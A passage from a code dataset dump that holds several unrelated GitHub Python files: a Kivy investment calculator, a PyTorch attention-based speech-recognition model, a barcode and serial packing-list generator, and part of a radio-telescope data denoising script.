False,width=150)\n\t\tlayout.add_widget(self.t1)\n\t\t\n\t\tl2=MyLabel(text=\"Monthly Interest Rate\")\n\t\tlayout.add_widget(l2)\n\t\t\n\t\tself.t2 = TextInput(text = \"0\", multiline = False,width=150)\n\t\tlayout.add_widget(self.t2)\n\t\t\n\t\tl3=MyLabel(text=\"Years\")\n\t\tlayout.add_widget(l3)\n\t\t\n\t\tself.t3 = TextInput(text = \"0\", multiline = False,width=150)\n\t\tlayout.add_widget(self.t3)\n\n\t\tpass \n\t\t\n\t\t\n\t\tl4=MyLabel(text=\"Future Value\")\n\t\tlayout.add_widget(l4)\n\t\t\n\t\tself.l5=MyLabel(text=\"$0.00\",width=150)\n\t\tlayout.add_widget(self.l5)\n\t\t\n\t\tpass\n\t\t\n\t\tbtn = Button(text=\"Calculate\", on_press=self.calculate, font_size=24)\n\t\tlayout.add_widget(btn)\n\t\t\n\t\texit = Button(text=\"Exit\", on_press=self.quit_app, font_size=24)\n\t\tlayout.add_widget(exit)\n\t\t\n\t\t\n\t\treturn layout \n\n\tdef calculate(self, instance):\n\t\tinv_amt = float(self.t1.text)\n\t\tyears = float(self.t3.text)\n\t\tmth_int_rate = float(self.t2.text)\n\t\tself.txt_future_val=inv_amt*(1+mth_int_rate)**(12*years)\n\t\tself.l5.text = \"$%.2f\" %(self.txt_future_val)\n\t\t\n\tdef quit_app(self, value):\n\t\tApp.get_running_app().stop()\n\t\texit()\n\n\n\nInvestment().run()","repo_name":"justiniansiah/10.009-Digital-Word","sub_path":"Week 11/cs3_investment.py","file_name":"cs3_investment.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4455276085","text":"import math\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions.categorical import Categorical\n\nfrom src.util import init_weights, init_gate\nfrom src.module import VGGExtractor, CNNExtractor, RNNLayer, ScaleDotAttention, LocationAwareAttention\n\n\nclass ASR(nn.Module):\n ''' ASR model, including Encoder/Decoder(s)'''\n\n def __init__(self, input_size, vocab_size, init_adadelta, ctc_weight, encoder, attention, decoder, emb_drop=0.0):\n super(ASR, self).__init__()\n\n # Setup\n assert 0 <= ctc_weight <= 1\n self.vocab_size = vocab_size\n self.ctc_weight = ctc_weight\n self.enable_ctc = ctc_weight > 0\n self.enable_att = ctc_weight != 1\n self.lm = None\n\n # Modules\n self.encoder = Encoder(input_size, **encoder)\n if self.enable_ctc:\n self.ctc_layer = nn.Linear(self.encoder.out_dim, vocab_size)\n if self.enable_att:\n self.dec_dim = decoder['dim']\n self.pre_embed = nn.Embedding(vocab_size, self.dec_dim)\n self.embed_drop = nn.Dropout(emb_drop)\n self.decoder = Decoder(\n self.encoder.out_dim+self.dec_dim, vocab_size, **decoder)\n query_dim = self.dec_dim*self.decoder.layer\n self.attention = Attention(\n self.encoder.out_dim, query_dim, **attention)\n\n # Init\n if init_adadelta:\n self.apply(init_weights)\n if self.enable_att:\n for l in range(self.decoder.layer):\n bias = getattr(self.decoder.layers, 'bias_ih_l{}'.format(l))\n bias = init_gate(bias)\n\n def set_state(self, prev_state, prev_attn):\n ''' Setting up all memory states for beam decoding'''\n self.decoder.set_state(prev_state)\n self.attention.set_mem(prev_attn)\n\n def create_msg(self):\n # Messages for user\n msg = []\n msg.append('Model spec.| Encoder\\'s downsampling rate of time axis is {}.'.format(\n self.encoder.sample_rate))\n if self.encoder.vgg:\n msg.append(\n ' | VGG Extractor w/ time downsampling rate = 4 in encoder enabled.')\n if self.encoder.cnn:\n msg.append(\n ' | CNN Extractor w/ time downsampling rate = 4 in encoder enabled.')\n if self.enable_ctc:\n 
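The Kivy app's `calculate` method evaluates the compound-interest future value FV = P(1 + r)^(12y). A quick worked check of that formula outside the UI:

```python
def future_value(principal, monthly_rate, years):
    # Same formula as Investment.calculate above.
    return principal * (1 + monthly_rate) ** (12 * years)

# $1000 at 1% per month for 2 years -> 1000 * 1.01 ** 24
print(f"${future_value(1000, 0.01, 2):.2f}")  # $1269.73
```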
msg.append(' | CTC training on encoder enabled ( lambda = {}).'.format(\n self.ctc_weight))\n if self.enable_att:\n msg.append(' | {} attention decoder enabled ( lambda = {}).'.format(\n self.attention.mode, 1-self.ctc_weight))\n return msg\n\n def forward(self, audio_feature, feature_len, decode_step, tf_rate=0.0, teacher=None,\n emb_decoder=None, get_dec_state=False):\n '''\n Arguments\n audio_feature - [BxTxD] Acoustic feature with shape \n feature_len - [B] Length of each sample in a batch\n decode_step - [int] The maximum number of attention decoder steps \n tf_rate - [0,1] The probability to perform teacher forcing for each step\n teacher - [BxL] Ground truth for teacher forcing with sentence length L\n emb_decoder - [obj] Introduces the word embedding decoder, different behavior for training/inference\n At training stage, this ONLY affects self-sampling (output remains the same)\n At inference stage, this affects output to become log prob. with distribution fusion\n get_dec_state - [bool] If true, return decoder state [BxLxD] for other purpose\n '''\n # Init\n bs = audio_feature.shape[0]\n ctc_output, att_output, att_seq = None, None, None\n dec_state = [] if get_dec_state else None\n\n # Encode\n encode_feature, encode_len = self.encoder(audio_feature, feature_len)\n\n # CTC based decoding\n if self.enable_ctc:\n ctc_output = F.log_softmax(self.ctc_layer(encode_feature), dim=-1)\n\n # Attention based decoding\n if self.enable_att:\n # Init (init char = , reset all rnn state and cell)\n self.decoder.init_state(bs)\n self.attention.reset_mem()\n last_char = self.pre_embed(torch.zeros(\n (bs), dtype=torch.long, device=encode_feature.device))\n att_seq, output_seq = [], []\n\n # Preprocess data for teacher forcing\n if teacher is not None:\n teacher = self.embed_drop(self.pre_embed(teacher))\n\n # Decode\n for t in range(decode_step):\n # Attend (inputs current state of first layer, encoded features)\n attn, context = self.attention(\n self.decoder.get_query(), encode_feature, encode_len)\n # Decode (inputs context + embedded last character)\n decoder_input = torch.cat([last_char, context], dim=-1)\n cur_char, d_state = self.decoder(decoder_input)\n # Prepare output as input of next step\n if (teacher is not None):\n # Training stage\n if (tf_rate == 1) or (torch.rand(1).item() <= tf_rate):\n # teacher forcing\n last_char = teacher[:, t, :]\n else:\n # self-sampling (replace by argmax may be another choice)\n with torch.no_grad():\n if (emb_decoder is not None) and emb_decoder.apply_fuse:\n _, cur_prob = emb_decoder(\n d_state, cur_char, return_loss=False)\n else:\n cur_prob = cur_char.softmax(dim=-1)\n sampled_char = Categorical(cur_prob).sample()\n last_char = self.embed_drop(\n self.pre_embed(sampled_char))\n else:\n # Inference stage\n if (emb_decoder is not None) and emb_decoder.apply_fuse:\n _, cur_char = emb_decoder(\n d_state, cur_char, return_loss=False)\n # argmax for inference\n last_char = self.pre_embed(torch.argmax(cur_char, dim=-1))\n\n # save output of each step\n output_seq.append(cur_char)\n att_seq.append(attn)\n if get_dec_state:\n dec_state.append(d_state)\n\n att_output = torch.stack(output_seq, dim=1) # BxTxV\n att_seq = torch.stack(att_seq, dim=2) # BxNxDtxT\n if get_dec_state:\n dec_state = torch.stack(dec_state, dim=1)\n\n return ctc_output, encode_len, att_output, att_seq, dec_state\n\n\nclass Decoder(nn.Module):\n ''' Decoder (a.k.a. 
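The attention decoder's forward pass decides per step whether to teacher-force by comparing a uniform draw against `tf_rate`. The gate in isolation, as a minimal sketch:

```python
import torch

tf_rate = 0.5  # probability of feeding the ground-truth token
for step in range(3):
    use_teacher = (tf_rate == 1) or (torch.rand(1).item() <= tf_rate)
    # True  -> next decoder input comes from the reference transcript
    # False -> next decoder input is the model's own (sampled) prediction
    print(step, use_teacher)
```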
Speller in LAS) '''\n # ToDo: More elegant way to implement decoder\n\n def __init__(self, input_dim, vocab_size, module, dim, layer, dropout):\n super(Decoder, self).__init__()\n self.in_dim = input_dim\n self.layer = layer\n self.dim = dim\n self.dropout = dropout\n\n # Init\n assert module in ['LSTM', 'GRU'], NotImplementedError\n self.hidden_state = None\n self.enable_cell = module == 'LSTM'\n\n # Modules\n self.layers = getattr(nn, module)(\n input_dim, dim, num_layers=layer, dropout=dropout, batch_first=True)\n self.char_trans = nn.Linear(dim, vocab_size)\n self.final_dropout = nn.Dropout(dropout)\n\n def init_state(self, bs):\n ''' Set all hidden states to zeros '''\n device = next(self.parameters()).device\n if self.enable_cell:\n self.hidden_state = (torch.zeros((self.layer, bs, self.dim), device=device),\n torch.zeros((self.layer, bs, self.dim), device=device))\n else:\n self.hidden_state = torch.zeros(\n (self.layer, bs, self.dim), device=device)\n return self.get_state()\n\n def set_state(self, hidden_state):\n ''' Set all hidden states/cells, for decoding purpose'''\n device = next(self.parameters()).device\n if self.enable_cell:\n self.hidden_state = (hidden_state[0].to(\n device), hidden_state[1].to(device))\n else:\n self.hidden_state = hidden_state.to(device)\n\n def get_state(self):\n ''' Return all hidden states/cells, for decoding purpose'''\n if self.enable_cell:\n return (self.hidden_state[0].cpu(), self.hidden_state[1].cpu())\n else:\n return self.hidden_state.cpu()\n\n def get_query(self):\n ''' Return state of all layers as query for attention '''\n if self.enable_cell:\n return self.hidden_state[0].transpose(0, 1).reshape(-1, self.dim*self.layer)\n else:\n return self.hidden_state.transpose(0, 1).reshape(-1, self.dim*self.layer)\n\n def forward(self, x):\n ''' Decode and transform into vocab '''\n if not self.training:\n self.layers.flatten_parameters()\n x, self.hidden_state = self.layers(x.unsqueeze(1), self.hidden_state)\n x = x.squeeze(1)\n char = self.char_trans(self.final_dropout(x))\n return char, x\n\n\nclass Attention(nn.Module):\n ''' Attention mechanism\n please refer to http://www.aclweb.org/anthology/D15-1166 section 3.1 for more details about Attention implementation\n Input : Decoder state with shape [batch size, decoder hidden dimension]\n Compressed feature from Encoder with shape [batch size, T, encoder feature dimension]\n Output: Attention score with shape [batch size, num head, T (attention score of each time step)]\n Context vector with shape [batch size, encoder feature dimension]\n (i.e. weighted (by attention score) sum of all timesteps T's feature) '''\n\n def __init__(self, v_dim, q_dim, mode, dim, num_head, temperature, v_proj,\n loc_kernel_size, loc_kernel_num):\n super(Attention, self).__init__()\n\n # Setup\n self.v_dim = v_dim\n self.dim = dim\n self.mode = mode.lower()\n self.num_head = num_head\n\n # Linear proj. 
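`Decoder.init_state` allocates LSTM hidden and cell tensors shaped `(num_layers, batch, hidden_dim)`. A standalone sketch of those shapes driving a single decode step:

```python
import torch
import torch.nn as nn

layer, bs, dim, in_dim = 2, 4, 8, 16
rnn = nn.LSTM(in_dim, dim, num_layers=layer, batch_first=True)
state = (torch.zeros(layer, bs, dim),   # hidden state
         torch.zeros(layer, bs, dim))   # cell state (LSTM only)
out, state = rnn(torch.randn(bs, 1, in_dim), state)
print(out.shape)  # torch.Size([4, 1, 8]) -- one step per call
```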
before attention\n self.proj_q = nn.Linear(q_dim, dim*num_head)\n self.proj_k = nn.Linear(v_dim, dim*num_head)\n self.v_proj = v_proj\n if v_proj:\n self.proj_v = nn.Linear(v_dim, v_dim*num_head)\n\n # Attention\n if self.mode == 'dot':\n self.att_layer = ScaleDotAttention(temperature, self.num_head)\n elif self.mode == 'loc':\n self.att_layer = LocationAwareAttention(\n loc_kernel_size, loc_kernel_num, dim, num_head, temperature)\n else:\n raise NotImplementedError\n\n # Layer for merging MHA\n if self.num_head > 1:\n self.merge_head = nn.Linear(v_dim*num_head, v_dim)\n\n # Stored feature\n self.key = None\n self.value = None\n self.mask = None\n\n def reset_mem(self):\n self.key = None\n self.value = None\n self.mask = None\n self.att_layer.reset_mem()\n\n def set_mem(self, prev_attn):\n self.att_layer.set_mem(prev_attn)\n\n def forward(self, dec_state, enc_feat, enc_len):\n\n # Preprecessing\n bs, ts, _ = enc_feat.shape\n query = torch.tanh(self.proj_q(dec_state))\n query = query.view(bs, self.num_head, self.dim).view(\n bs*self.num_head, self.dim) # BNxD\n\n if self.key is None:\n # Maskout attention score for padded states\n self.att_layer.compute_mask(enc_feat, enc_len.to(enc_feat.device))\n\n # Store enc state to lower computational cost\n self.key = torch.tanh(self.proj_k(enc_feat))\n self.value = torch.tanh(self.proj_v(\n enc_feat)) if self.v_proj else enc_feat # BxTxN\n\n if self.num_head > 1:\n self.key = self.key.view(bs, ts, self.num_head, self.dim).permute(\n 0, 2, 1, 3) # BxNxTxD\n self.key = self.key.contiguous().view(bs*self.num_head, ts, self.dim) # BNxTxD\n if self.v_proj:\n self.value = self.value.view(\n bs, ts, self.num_head, self.v_dim).permute(0, 2, 1, 3) # BxNxTxD\n self.value = self.value.contiguous().view(\n bs*self.num_head, ts, self.v_dim) # BNxTxD\n else:\n self.value = self.value.repeat(self.num_head, 1, 1)\n\n # Calculate attention\n context, attn = self.att_layer(query, self.key, self.value)\n if self.num_head > 1:\n context = context.view(\n bs, self.num_head*self.v_dim) # BNxD -> BxND\n context = self.merge_head(context) # BxD\n\n return attn, context\n\n\nclass Encoder(nn.Module):\n ''' Encoder (a.k.a. 
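The multi-head reshuffle in `Attention.forward` turns `(B, T, N*D)` projections into `(B*N, T, D)` so each head attends independently. The same reshape in isolation:

```python
import torch

bs, ts, num_head, dim = 2, 5, 4, 8
key = torch.randn(bs, ts, num_head * dim)
key = key.view(bs, ts, num_head, dim).permute(0, 2, 1, 3)  # B x N x T x D
key = key.contiguous().view(bs * num_head, ts, dim)        # BN x T x D
print(key.shape)  # torch.Size([8, 5, 8])
```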
Listener in LAS)\n Encodes acoustic feature to latent representation, see config file for more details.'''\n\n def __init__(self, input_size, prenet, module, bidirection, dim, dropout, layer_norm, proj, sample_rate, sample_style):\n super(Encoder, self).__init__()\n\n # Hyper-parameters checking\n self.vgg = prenet == 'vgg'\n self.cnn = prenet == 'cnn'\n self.sample_rate = 1\n assert len(sample_rate) == len(dropout), 'Number of layer mismatch'\n assert len(dropout) == len(dim), 'Number of layer mismatch'\n num_layers = len(dim)\n assert num_layers >= 1, 'Encoder should have at least 1 layer'\n\n # Construct model\n module_list = []\n input_dim = input_size\n\n # Prenet on audio feature\n if self.vgg:\n vgg_extractor = VGGExtractor(input_size)\n module_list.append(vgg_extractor)\n input_dim = vgg_extractor.out_dim\n self.sample_rate = self.sample_rate*4\n if self.cnn:\n cnn_extractor = CNNExtractor(input_size, out_dim=dim[0])\n module_list.append(cnn_extractor)\n input_dim = cnn_extractor.out_dim\n self.sample_rate = self.sample_rate*4\n\n # Recurrent encoder\n if module in ['LSTM', 'GRU']:\n for l in range(num_layers):\n module_list.append(RNNLayer(input_dim, module, dim[l], bidirection, dropout[l], layer_norm[l],\n sample_rate[l], sample_style, proj[l]))\n input_dim = module_list[-1].out_dim\n self.sample_rate = self.sample_rate*sample_rate[l]\n else:\n raise NotImplementedError\n\n # Build model\n self.in_dim = input_size\n self.out_dim = input_dim\n self.layers = nn.ModuleList(module_list)\n\n def forward(self, input_x, enc_len):\n for _, layer in enumerate(self.layers):\n input_x, enc_len = layer(input_x, enc_len)\n return input_x, enc_len\n","repo_name":"Alexander-H-Liu/End-to-end-ASR-Pytorch","sub_path":"src/asr.py","file_name":"asr.py","file_ext":"py","file_size_in_byte":15234,"program_lang":"python","lang":"en","doc_type":"code","stars":1141,"dataset":"github-code","pt":"48"} +{"seq_id":"13038033120","text":"from last_palet_barcode import give_last_palet_barcode\r\nfrom give_serial_for_palets import give_Serials_for_palet\r\nfrom give_barcode_forpalet import give_barcode_forpalet\r\nimport os\r\nimport sys\r\nimport numpy as np\r\nimport re\r\n\r\n\r\ndef main(big_file_folder:str ,\r\n output_folder_name: str,\r\n output_file_name: str,\r\n packing_list_file_name: str,\r\n packing_list_folder_name: str,\r\n tarh: int,\r\n num_in_palet: int,\r\n start_index: int,\r\n accumulator: int,\r\n big_file_names_sorted):\r\n \r\n\r\n ### For barcodes:\r\n ### Last pallet has 2 extra \\n\r\n ### Others barcodes file have 1 extra \\n\r\n if len(big_file_names_sorted) != 1:\r\n path = os.path.join(big_file_folder, big_file_names_sorted[-1])\r\n last_palet_barcodes = give_last_palet_barcode(path)\r\n\r\n sizes = []\r\n for i in big_file_names_sorted:\r\n sizes.append(os.path.getsize(os.path.join(big_file_folder, i)))\r\n\r\n sizes = np.array(sizes)\r\n if np.unique(sizes).shape == (1,):\r\n # print('files have same sizes') \r\n num_last_palet = len(last_palet_barcodes)-1\r\n\r\n else:\r\n # print('files have different sizes') \r\n num_last_palet = len(last_palet_barcodes)-2\r\n\r\n total_barcodes = ((len(big_file_names_sorted)-1)*num_in_palet) + num_last_palet\r\n # starter indices in each output file\r\n STARTERS = np.arange(start_index, total_barcodes + start_index, num_in_palet)\r\n os.makedirs(output_folder_name, exist_ok=True)\r\n os.makedirs(packing_list_folder_name, exist_ok=True)\r\n \r\n # only one file exist\r\n else:\r\n path = os.path.join(big_file_folder, big_file_names_sorted[0]) 
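The barcode script computes each pallet's first serial number with `np.arange`. A tiny worked example of that STARTERS computation:

```python
import numpy as np

start_index, total_barcodes, num_in_palet = 1, 1_000_000, 400_000
starters = np.arange(start_index, total_barcodes + start_index, num_in_palet)
print(starters)  # [     1 400001 800001] -- first serial of each pallet
```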
\r\n last_palet_barcodes = give_last_palet_barcode(path)\r\n num_last_palet = len(last_palet_barcodes)-1\r\n last_palet_barcodes = last_palet_barcodes[:-1]\r\n total_barcodes = num_last_palet\r\n STARTERS = np.arange(start_index, total_barcodes + start_index , num_in_palet)\r\n os.makedirs(output_folder_name, exist_ok=True)\r\n os.makedirs(packing_list_folder_name, exist_ok=True)\r\n\r\n for fileNumber, Starter in enumerate(STARTERS):\r\n # processing first sub-txt file which is NOT the only one file also. \r\n if fileNumber == 0 and len(big_file_names_sorted) != 1 :\r\n\r\n if Starter >= 1e+6:\r\n add_zeros = False\r\n else:\r\n add_zeros = True\r\n\r\n # produce serial\r\n serial_for1palet = give_Serials_for_palet(num_in_palet=num_in_palet,\r\n total_barcodes=total_barcodes + start_index,\r\n tarh=tarh,\r\n accumulator=accumulator,\r\n starter=Starter,\r\n fileNumber=fileNumber+1,\r\n start_index = start_index,\r\n add_zeros=add_zeros)\r\n\r\n min_lenght = len(serial_for1palet[0])\r\n max_lenght = len(serial_for1palet[-1])\r\n\r\n serial_for1palet = np.array(serial_for1palet).reshape(-1, tarh)\r\n\r\n # get the barcodes\r\n path = os.path.join(big_file_folder, big_file_names_sorted[fileNumber])\r\n barcodes_for1palet = give_barcode_forpalet(path, num_in_palet)\r\n barcodes_for1palet = barcodes_for1palet.reshape(-1, tarh)\r\n\r\n # combine barcodes and serials\r\n output = np.dstack(\r\n (barcodes_for1palet, serial_for1palet)).flatten()\r\n output = output.reshape(-1, tarh*2)\r\n\r\n np.savetxt(\r\n f'{output_folder_name}/{output_file_name}_{fileNumber+1}.txt', output, delimiter=',', fmt='%s')\r\n\r\n packing_list_output = output.reshape(num_in_palet, 2)\r\n\r\n # serials = packing_list_output[:, 1]\r\n if min_lenght == max_lenght:\r\n\r\n packing_list_output = sorted(packing_list_output, key=lambda x: x[1])\r\n else:\r\n packing_list_output = sorted(packing_list_output, key= lambda x: natural_keys(x[1]))\r\n\r\n np.savetxt(f'{packing_list_folder_name}/{packing_list_file_name}_{fileNumber+1}.txt',\r\n packing_list_output, delimiter=',', fmt='%s')\r\n \r\n print(f\"making file % {int(((fileNumber+1)/len(big_file_names_sorted)) * 100)}\", end='\\r')\r\n\r\n # processing intermediate sub-txt files -not 1 and not last (between)\r\n if (fileNumber != STARTERS.shape[0]-1) & (fileNumber != 0):\r\n \r\n if Starter >= 1e+6:\r\n add_zeros = False\r\n else:\r\n add_zeros = True\r\n\r\n serial_for1palet = give_Serials_for_palet(num_in_palet=num_in_palet,\r\n total_barcodes=total_barcodes,\r\n tarh=tarh,\r\n accumulator=accumulator,\r\n starter=Starter,\r\n fileNumber=fileNumber+1,\r\n start_index = start_index,\r\n add_zeros=add_zeros)\r\n \r\n min_lenght = len(serial_for1palet[0])\r\n max_lenght = len(serial_for1palet[-1])\r\n\r\n serial_for1palet = np.array(serial_for1palet).reshape(-1, tarh)\r\n\r\n # get the barcodes\r\n path = os.path.join(big_file_folder, big_file_names_sorted[fileNumber])\r\n barcodes_for1palet = give_barcode_forpalet(path, num_in_palet)\r\n barcodes_for1palet = barcodes_for1palet.reshape(-1, tarh)\r\n\r\n # combine barcodes and serials\r\n output = np.dstack(\r\n (barcodes_for1palet, serial_for1palet)).flatten()\r\n output = output.reshape(-1, tarh*2)\r\n\r\n np.savetxt(\r\n f'{output_folder_name}/{output_file_name}_{fileNumber+1}.txt', output, delimiter=',', fmt='%s')\r\n\r\n packing_list_output = output.reshape(num_in_palet, 2)\r\n # serials = packing_list_output[:, 1]\r\n\r\n if min_lenght == max_lenght:\r\n packing_list_output = sorted(packing_list_output, key=lambda x: 
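The `np.dstack(...).flatten()` idiom above interleaves barcodes and serials element by element before reshaping into output rows. In miniature:

```python
import numpy as np

barcodes = np.array(['b1', 'b2', 'b3', 'b4'])
serials = np.array(['s1', 's2', 's3', 's4'])
interleaved = np.dstack((barcodes, serials)).flatten()
print(interleaved)  # ['b1' 's1' 'b2' 's2' 'b3' 's3' 'b4' 's4']
```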
x[1])\r\n else:\r\n packing_list_output = sorted(packing_list_output, key= lambda x: natural_keys(x[1]))\r\n\r\n np.savetxt(f'{packing_list_folder_name}/{packing_list_file_name}_{fileNumber+1}.txt',\r\n packing_list_output, delimiter=',', fmt='%s')\r\n \r\n print(f\"making file % {int(((fileNumber+1)/len(big_file_names_sorted)) * 100)}\", end='\\r')\r\n\r\n\r\n # processing last sub-txt files or the only one\r\n if fileNumber == STARTERS.shape[0]-1 or len(big_file_names_sorted) == 1:\r\n if Starter >= 1e+6:\r\n add_zeros = False\r\n else:\r\n add_zeros = True\r\n\r\n serial_for1palet = give_Serials_for_palet(num_in_palet=num_last_palet,\r\n total_barcodes=total_barcodes,\r\n tarh=tarh,\r\n accumulator=accumulator,\r\n starter=Starter,\r\n fileNumber=fileNumber,\r\n last_file=True,\r\n add_zeros=add_zeros,\r\n start_index = start_index)\r\n \r\n min_lenght = len(serial_for1palet[0])\r\n max_lenght = len(serial_for1palet[-1])\r\n \r\n # get the barcodes\r\n if len(big_file_names_sorted) != 1:\r\n path = os.path.join(big_file_folder, big_file_names_sorted[fileNumber])\r\n barcodes_for1palet = give_last_palet_barcode(path)\r\n\r\n if np.unique(sizes).shape == (1,):\r\n\r\n barcodes_for1palet = barcodes_for1palet[:-1]\r\n else:\r\n barcodes_for1palet = barcodes_for1palet[:-2]\r\n else:\r\n barcodes_for1palet = last_palet_barcodes\r\n\r\n o = num_last_palet * 2\r\n n_rows_last_file = o // (tarh * 2)\r\n n_last_row_last_file = o - (n_rows_last_file * tarh * 2)\r\n\r\n p = num_last_palet // tarh # Calculate if all num_last_palet fits in tarh or not\r\n j = num_last_palet - p * tarh\r\n output = np.dstack(\r\n (barcodes_for1palet, serial_for1palet)).flatten()\r\n\r\n if j != 0:\r\n\r\n t = output[:-n_last_row_last_file].reshape(-1, tarh*2)\r\n t2 = output[-n_last_row_last_file:]\r\n t2 = t2.tolist()\r\n \r\n np.savetxt(\r\n f'{output_folder_name}/{output_file_name}_{fileNumber+1}.txt', t, delimiter=',', fmt='%s')\r\n \r\n with open(f'{output_folder_name}/{output_file_name}_{fileNumber+1}.txt', 'a') as f:\r\n for item in t2:\r\n f.write('%s,' % item)\r\n\r\n else:\r\n np.savetxt(\r\n f'{output_folder_name}/{output_file_name}_{fileNumber+1}.txt', output.reshape(-1, tarh*2), delimiter=',', fmt='%s')\r\n\r\n packing_list_output = output.reshape(-1, 2)\r\n\r\n # serials = packing_list_output[:, 1]\r\n\r\n if min_lenght == max_lenght:\r\n packing_list_output = sorted(packing_list_output, key=lambda x: x[1])\r\n else:\r\n packing_list_output = sorted(packing_list_output, key= lambda x: natural_keys(x[1]))\r\n\r\n np.savetxt(f'{packing_list_folder_name}/{packing_list_file_name}_{fileNumber+1}.txt',\r\n packing_list_output, delimiter=',', fmt='%s')\r\n \r\n print(f\"making file % {int(((fileNumber+1)/len(big_file_names_sorted)) * 100)}\", end='\\r')\r\n print(\"Done successfully!\")\r\n\r\ndef atoi(text):\r\n return int(text) if text.isdigit() else text\r\n\r\ndef natural_keys(text):\r\n return [atoi(c) for c in re.split(r'(\\d+)', text)]\r\n\r\nif __name__ == '__main__':\r\n # give_barcode(big_file, 6120000)\r\n # big_file = 'Pocket_14001114_Letter_3966575_Part1_236Milion.txt'\r\n\r\n # big_file_folder = \"big_folder_12mil\"\r\n # num_in_palet = 400_000\r\n # tarh = 32\r\n # start_index = 1\r\n # output_folder_name = \"output_folder\"\r\n # output_file_name = \"out\"\r\n # packing_list_folder_name = \"packing_folder\"\r\n # packing_list_file_name = \"packing\"\r\n # accumulator = 500\r\n\r\n big_file_folder = input('big_file_folder: ')\r\n assert os.path.exists(big_file_folder), f\"{big_file_folder} does 
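The `natural_keys` helper defined above makes `sorted` treat digit runs numerically, which matters for names like `part10` versus `part2`. A usage example:

```python
import re

def natural_keys(text):
    return [int(c) if c.isdigit() else c for c in re.split(r'(\d+)', text)]

names = ['part10.txt', 'part2.txt', 'part1.txt']
print(sorted(names))                    # ['part1.txt', 'part10.txt', 'part2.txt']
print(sorted(names, key=natural_keys))  # ['part1.txt', 'part2.txt', 'part10.txt']
```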
NOT exists !\"\r\n num_in_palet = int(input('num_in_palet: '))\r\n\r\n big_file_names = os.listdir(big_file_folder)\r\n big_file_names.sort(key=natural_keys) \r\n\r\n number_barcodes_in_each_file = 0\r\n if len(big_file_names) != 1:\r\n with open(os.path.join(big_file_folder, big_file_names[0])) as f :\r\n for line in f:\r\n number_barcodes_in_each_file += 1\r\n\r\n assert number_barcodes_in_each_file == num_in_palet, f\"number of palet provided is {num_in_palet} but in each file there are {number_barcodes_in_each_file} barcodes\"\r\n\r\n tarh = int(input('tarh: '))\r\n\r\n assert num_in_palet % tarh == 0, f\"{num_in_palet} (pallet number) should be devisible by 'tarh'\"\r\n\r\n start_index = int(input(\"start index : \"))\r\n output_folder_name = input('output_folder_name: ')\r\n output_file_name = input('output_file_name: ')\r\n packing_list_folder_name = input('packing_list_folder_name: ')\r\n packing_list_file_name = input('packing_list_file_name: ')\r\n\r\n accumulator = int(input('accumulator: '))\r\n\r\n\r\n\r\n main(big_file_folder=big_file_folder,\r\n output_folder_name=output_folder_name,\r\n output_file_name=output_file_name,\r\n packing_list_file_name=packing_list_file_name,\r\n packing_list_folder_name=packing_list_folder_name,\r\n tarh=tarh,\r\n num_in_palet=num_in_palet,\r\n start_index = start_index,\r\n accumulator = accumulator,\r\n big_file_names_sorted = big_file_names)\r\n","repo_name":"ImanGoudarzvand/Barcode-Serial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42056155115","text":"import bmxobs as bmx\nimport matplotlib.pyplot as plt \nimport numpy as np\nimport scipy.optimize as opt\nimport scipy.signal as sgn \nimport os \n\ndef linear(x,a,b):\n return a*x+b\n\n\n################denoising###################\ndef denoise(dat_file,channel, n_pix, Time = [0,1]):\n \n print(\"denoising\")\n #Determine the fit constants a,b in af+b for every time step\n data = np.transpose(dat_file[int(channel)])\n freq = dat_file.freq[int(channel[2])]\n x_fit_top = freq[freq.size-n_pix:freq.size]\n x_fit_bot = freq[0:n_pix]\n\n size = data[0].size\n fit_array = np.zeros(shape = (4,size))\n for iter in np.arange(size):\n y_fit_top = np.flip(np.transpose(data[0:n_pix, iter]))\n y_fit_bot = np.flip(np.transpose(data[np.shape(data)[0]-n_pix:np.shape(data)[0], iter]))\n const_out_top, junk = opt.curve_fit(linear, x_fit_top, y_fit_top)\n const_out_bot, junk = opt.curve_fit(linear,x_fit_bot,y_fit_bot)\n\n const_out_top = np.transpose(const_out_top)\n const_out_bot = np.transpose(const_out_bot)\n fit_array[:,iter] = np.concatenate((const_out_top,const_out_bot), axis = 0)\n\n os.system('clear')\n per = 100*float(iter)/float(size)\n print(\"%.5f\" % per, \"% of denoising done\")\n \n\n avg_fit_array = np.empty(shape = (2,data[0].size))\n avg_fit_array[0,:] = (fit_array[0,:]+fit_array[2,:])/2.0\n avg_fit_array[1,:] = (fit_array[1,:]+fit_array[3,:])/2.0\n\n #Smoothen fit of (a,b) to determine gain\n Times = np.linspace(Time[0], Time[1], num = data[0,:].size, endpoint = True)\n\n for i in np.arange(0,2):\n avg_fit_array[i,:] = sgn.savgol_filter(avg_fit_array[i,:], 1001, 3)\n \n\n gain_array = np.zeros(shape = np.shape(data))\n\n for iter in np.arange(data[0].size):\n gain_array[:,iter] = np.flip(linear(freq, avg_fit_array[0,iter], avg_fit_array[1,iter]))\n \n ones = np.ones(shape = np.shape(data))\n\n denoised_out = np.divide(data,gain_array) - ones 
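The `denoise` routine below fits a straight line to the band edges with `scipy.optimize.curve_fit`. The fitting call on synthetic data, as a self-contained sketch:

```python
import numpy as np
import scipy.optimize as opt

def linear(x, a, b):
    return a * x + b

x = np.linspace(0, 10, 50)
y = linear(x, 2.0, 1.0) + np.random.normal(0, 0.1, x.size)
(a_fit, b_fit), _ = opt.curve_fit(linear, x, y)
print(a_fit, b_fit)  # close to 2.0 and 1.0
```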
